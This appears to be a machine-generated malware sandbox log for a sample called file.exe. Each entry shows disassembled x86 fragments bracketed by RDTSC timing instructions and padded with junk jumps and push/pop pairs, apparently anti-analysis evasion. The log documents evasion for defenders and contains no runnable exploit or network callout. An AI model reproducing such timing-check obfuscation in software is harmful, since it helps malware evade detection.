                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7942B5 second address: 7942DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F701CDA8A75h 0x0000000e jbe 00007F701CDA8A66h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7942DA second address: 7942E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7942E1 second address: 794356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F701CDA8A68h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 jmp 00007F701CDA8A70h 0x00000027 lea eax, dword ptr [ebp+1248605Bh] 0x0000002d jmp 00007F701CDA8A77h 0x00000032 nop 0x00000033 pushad 0x00000034 jmp 00007F701CDA8A76h 0x00000039 push eax 0x0000003a push edx 0x0000003b jnl 00007F701CDA8A66h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794356 second address: 770A59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC837Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push esi 0x0000000c jng 00007F701CDC8378h 0x00000012 push eax 0x00000013 pop eax 0x00000014 pop esi 0x00000015 nop 0x00000016 or dword ptr [ebp+122D2E99h], eax 0x0000001c call dword ptr [ebp+12461050h] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F701CDC8380h 0x00000029 jmp 00007F701CDC8388h 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7947FA second address: 794800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794A12 second address: 794A16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794A16 second address: 794A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F701CDA8A78h 0x0000000b popad 0x0000000c xor dword ptr [esp], 14CC710Ah 0x00000013 jmp 00007F701CDA8A6Eh 0x00000018 call 00007F701CDA8A69h 0x0000001d jo 00007F701CDA8A74h 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794A5C second address: 794A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F701CDC8376h 0x0000000a popad 0x0000000b push eax 0x0000000c jbe 00007F701CDC83A9h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F701CDC8388h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794A88 second address: 794AAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDA8A75h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e js 00007F701CDA8A6Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794AAE second address: 794AC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jl 00007F701CDC8376h 0x0000000b pop ecx 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop esi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794AC3 second address: 794ADE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F701CDA8A77h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794BE4 second address: 794C00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC837Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b jc 00007F701CDC8388h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794C00 second address: 794C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794D5F second address: 794D63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794D63 second address: 794D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794D69 second address: 794D91 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007F701CDC8376h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e js 00007F701CDC8378h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F701CDC8380h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79546F second address: 79547D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F701CDA8A6Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7958A7 second address: 79592B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC8382h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F701CDC8378h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov dword ptr [ebp+124594D3h], ebx 0x0000002a mov edx, dword ptr [ebp+122D2BB3h] 0x00000030 lea eax, dword ptr [ebp+1248605Bh] 0x00000036 push 00000000h 0x00000038 push edx 0x00000039 call 00007F701CDC8378h 0x0000003e pop edx 0x0000003f mov dword ptr [esp+04h], edx 0x00000043 add dword ptr [esp+04h], 00000014h 0x0000004b inc edx 0x0000004c push edx 0x0000004d ret 0x0000004e pop edx 0x0000004f ret 0x00000050 mov edx, dword ptr [ebp+122D192Bh] 0x00000056 nop 0x00000057 jmp 00007F701CDC8381h 0x0000005c push eax 0x0000005d push ecx 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 popad 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79592B second address: 79592F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 750E7D second address: 750E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 750E84 second address: 750E8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 750E8A second address: 750E94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F701CDC8376h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 750E94 second address: 750E98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 750E98 second address: 750EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F701CDC8376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F701CDC8376h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 750EAC second address: 750EB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C3AFE second address: 7C3B0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F701CDC837Ah 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C3B0E second address: 7C3B18 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F701CDA8A6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CD701 second address: 7CD71A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F701CDC8376h 0x00000009 jmp 00007F701CDC837Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CD71A second address: 7CD72B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jo 00007F701CDA8A66h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CD72B second address: 7CD72F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CDB18 second address: 7CDB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 jp 00007F701CDA8A66h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CDF5A second address: 7CDF70 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F701CDC8378h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d je 00007F701CDC8376h 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE22E second address: 7CE232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE232 second address: 7CE242 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC837Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE242 second address: 7CE24B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE39F second address: 7CE3A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE4EF second address: 7CE4F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE4F4 second address: 7CE4FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE681 second address: 7CE6A6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F701CDA8A78h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CEB10 second address: 7CEB34 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F701CDC8376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b ja 00007F701CDC839Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007F701CDC8376h 0x00000019 jmp 00007F701CDC837Bh 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CD3EC second address: 7CD3F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4D44 second address: 7D4D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F701CDC8381h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4099 second address: 7D409D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D409D second address: 7D40A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D3840 second address: 7D3846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D44DE second address: 7D44F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007F701CDC8381h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D44F6 second address: 7D44FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4637 second address: 7D4641 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F701CDC8376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D6E73 second address: 7D6E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D6E77 second address: 7D6E80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D6E80 second address: 7D6E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D6FEA second address: 7D6FFA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F701CDC8376h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE7B2 second address: 7DE7BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE925 second address: 7DE92F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F701CDC837Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE92F second address: 7DE93D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F701CDA8A66h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEBE7 second address: 7DEBF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEBF5 second address: 7DEBF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEBF9 second address: 7DEC0E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F701CDC837Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEC0E second address: 7DEC1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 ja 00007F701CDA8A66h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEC1A second address: 7DEC34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC8386h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEEDD second address: 7DEEE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEEE3 second address: 7DEEFD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F701CDC8384h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DF021 second address: 7DF025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DF025 second address: 7DF02B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DF02B second address: 7DF040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F701CDA8A71h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DF040 second address: 7DF07A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC8380h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F701CDC837Ah 0x00000013 jmp 00007F701CDC8388h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0A52 second address: 7E0A68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDA8A72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0A68 second address: 7E0A97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F701CDC8388h 0x00000009 jmp 00007F701CDC8383h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3DA1 second address: 7E3DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3DA7 second address: 7E3DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3DAD second address: 7E3DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F701CDA8A71h 0x0000000c push edi 0x0000000d jng 00007F701CDA8A66h 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3694 second address: 7E36A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F701CDC8381h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E381C second address: 7E384F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jng 00007F701CDA8A66h 0x0000000f jc 00007F701CDA8A66h 0x00000015 jmp 00007F701CDA8A79h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push edx 0x0000001e pop edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E384F second address: 7E3853 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E3B01 second address: 7E3B06 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5424 second address: 7E5429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9D57 second address: 7E9D72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F701CDA8A77h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9F67 second address: 7E9F73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9F73 second address: 7E9F77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9F77 second address: 7E9F9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC8383h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007F701CDC8376h 0x00000010 jbe 00007F701CDC8376h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA273 second address: 7EA27E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA27E second address: 7EA290 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC837Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA290 second address: 7EA2A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F701CDA8A6Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA2A3 second address: 7EA2B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC837Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA2B6 second address: 7EA2BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA2BF second address: 7EA2C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA422 second address: 7EA445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F701CDA8A66h 0x0000000d jmp 00007F701CDA8A76h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA445 second address: 7EA449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA449 second address: 7EA462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F701CDA8A6Eh 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA462 second address: 7EA468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA5A3 second address: 7EA5AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA5AD second address: 7EA5B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F701CDC8376h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EB2EF second address: 7EB2F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EB2F3 second address: 7EB2FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F701CDC8376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F493F second address: 7F4944 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F4944 second address: 7F4966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F701CDC8386h 0x00000009 jno 00007F701CDC8376h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
